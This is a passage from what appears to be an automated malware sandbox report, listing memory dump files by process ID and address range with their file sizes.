                                          • memory/1512-133-0x0000000000000000-mapping.dmp

                                          • memory/1512-146-0x0000000077970000-0x0000000077B19000-memory.dmp

                                            Filesize

                                            1.7MB

                                          • memory/1512-175-0x0000000001114000-0x0000000001117000-memory.dmp

                                            Filesize

                                            12KB

                                          • memory/1512-141-0x0000000077970000-0x0000000077B19000-memory.dmp

                                            Filesize

                                            1.7MB

                                          • memory/1512-139-0x000000000111B000-0x000000000113A000-memory.dmp

                                            Filesize

                                            124KB

                                          • memory/1512-156-0x0000000077850000-0x000000007796F000-memory.dmp

                                            Filesize

                                            1.1MB

                                          • memory/1512-138-0x0000000001114000-0x0000000001117000-memory.dmp

                                            Filesize

                                            12KB

                                          • memory/1512-185-0x0000000077850000-0x000000007796F000-memory.dmp

                                            Filesize

                                            1.1MB

                                          • memory/1512-178-0x000000000111B000-0x000000000113A000-memory.dmp

                                            Filesize

                                            124KB

                                          • memory/1512-137-0x000007FEEC8B0000-0x000007FEED40D000-memory.dmp

                                            Filesize

                                            11.4MB

                                          • memory/1512-136-0x000007FEED410000-0x000007FEEDE33000-memory.dmp

                                            Filesize

                                            10.1MB

                                          • memory/1556-204-0x0000000077B50000-0x0000000077CD0000-memory.dmp

                                            Filesize

                                            1.5MB

                                          • memory/1556-135-0x0000000000000000-mapping.dmp

                                          • memory/1556-177-0x00000000744F0000-0x0000000074A9B000-memory.dmp

                                            Filesize

                                            5.7MB

                                          • memory/1556-140-0x00000000763F1000-0x00000000763F3000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1556-163-0x00000000744F0000-0x0000000074A9B000-memory.dmp

                                            Filesize

                                            5.7MB

                                          • memory/1556-68-0x0000000000000000-mapping.dmp

                                          • memory/1564-131-0x0000000000000000-mapping.dmp

                                          • memory/1564-176-0x0000000000080000-0x000000000009B000-memory.dmp

                                            Filesize

                                            108KB

                                          • memory/1608-127-0x0000000000000000-mapping.dmp

                                          • memory/1608-89-0x0000000000000000-mapping.dmp

                                          • memory/1652-76-0x0000000000000000-mapping.dmp

                                          • memory/1700-87-0x0000000000000000-mapping.dmp

                                          • memory/1712-90-0x0000000000000000-mapping.dmp

                                          • memory/1736-72-0x0000000000000000-mapping.dmp

                                          • memory/1768-109-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-129-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-111-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-112-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-113-0x0000000140001844-mapping.dmp

                                          • memory/1768-97-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-106-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-115-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-103-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-100-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-107-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-108-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1768-123-0x0000000140000000-0x0000000140056000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1816-119-0x0000000000000000-mapping.dmp

                                          • memory/1816-121-0x0000000000230000-0x0000000000238000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1824-70-0x0000000000000000-mapping.dmp

                                          • memory/1844-86-0x0000000000000000-mapping.dmp

                                          • memory/1896-55-0x000000001BDD0000-0x000000001C068000-memory.dmp

                                            Filesize

                                            2.6MB

                                          • memory/1896-56-0x000007FEFC1F1000-0x000007FEFC1F3000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1896-54-0x000000013F450000-0x000000013F74A000-memory.dmp

                                            Filesize

                                            3.0MB

                                          • memory/1896-96-0x0000000002410000-0x0000000002416000-memory.dmp

                                            Filesize

                                            24KB

                                          • memory/1908-73-0x0000000000000000-mapping.dmp

                                          • memory/1916-67-0x0000000000000000-mapping.dmp

                                          • memory/1928-83-0x0000000000000000-mapping.dmp

                                          • memory/2008-80-0x0000000000000000-mapping.dmp

                                          • memory/184688-191-0x0000000000400000-0x0000000000420000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/184688-157-0x0000000000400000-0x0000000000420000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/184688-149-0x0000000000400000-0x0000000000420000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/184688-154-0x000000000041A7DE-mapping.dmp

                                          • memory/184688-158-0x0000000000400000-0x0000000000420000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/184688-194-0x000000006F0C0000-0x000000006F0D0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/184688-145-0x0000000000400000-0x0000000000420000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/184688-211-0x00000000003C0000-0x00000000003E1000-memory.dmp

                                            Filesize

                                            132KB

                                          • memory/184688-201-0x00000000003A0000-0x00000000003BB000-memory.dmp

                                            Filesize

                                            108KB

                                          • memory/184716-148-0x0000000000000000-mapping.dmp

                                          • memory/184760-216-0x0000000001EA0000-0x0000000001EC1000-memory.dmp

                                            Filesize

                                            132KB

                                          • memory/184760-155-0x0000000000000000-mapping.dmp

                                          • memory/184760-196-0x000000006FB50000-0x000000006FB60000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/184776-250-0x00000000005E0000-0x0000000000601000-memory.dmp

                                            Filesize

                                            132KB

                                          • memory/184776-249-0x00000000000B0000-0x00000000000D1000-memory.dmp

                                            Filesize

                                            132KB

                                          • memory/184776-246-0x0000000000AF0000-0x0000000000AFA000-memory.dmp

                                            Filesize

                                            40KB

                                          • memory/184776-241-0x0000000000000000-mapping.dmp

                                          • memory/184800-159-0x0000000000000000-mapping.dmp

                                          • memory/184868-166-0x0000000000400000-0x0000000000435000-memory.dmp

                                            Filesize

                                            212KB

                                          • memory/184868-190-0x0000000077B50000-0x0000000077CD0000-memory.dmp

                                            Filesize

                                            1.5MB

                                          • memory/184868-167-0x00000000004039E0-mapping.dmp

                                          • memory/184868-188-0x0000000000400000-0x0000000000435000-memory.dmp

                                            Filesize

                                            212KB

                                          • memory/184868-170-0x0000000000400000-0x0000000000435000-memory.dmp

                                            Filesize

                                            212KB

                                          • memory/184868-235-0x0000000077B50000-0x0000000077CD0000-memory.dmp

                                            Filesize

                                            1.5MB

                                          • memory/184868-226-0x0000000000BE0000-0x0000000000C01000-memory.dmp

                                            Filesize

                                            132KB

                                          • memory/184908-234-0x0000000077970000-0x0000000077B19000-memory.dmp

                                            Filesize

                                            1.7MB

                                          • memory/184908-184-0x0000000140000000-0x0000000140042000-memory.dmp

                                            Filesize

                                            264KB

                                          • memory/184908-186-0x0000000077850000-0x000000007796F000-memory.dmp

                                            Filesize

                                            1.1MB

                                          • memory/184908-172-0x0000000140000000-0x0000000140042000-memory.dmp

                                            Filesize

                                            264KB

                                          • memory/184908-233-0x0000000140000000-0x0000000140042000-memory.dmp

                                            Filesize

                                            264KB

                                          • memory/184908-173-0x00000001400033F4-mapping.dmp

                                          • memory/184908-179-0x0000000140000000-0x0000000140042000-memory.dmp

                                            Filesize

                                            264KB

                                          • memory/184908-182-0x0000000077970000-0x0000000077B19000-memory.dmp

                                            Filesize

                                            1.7MB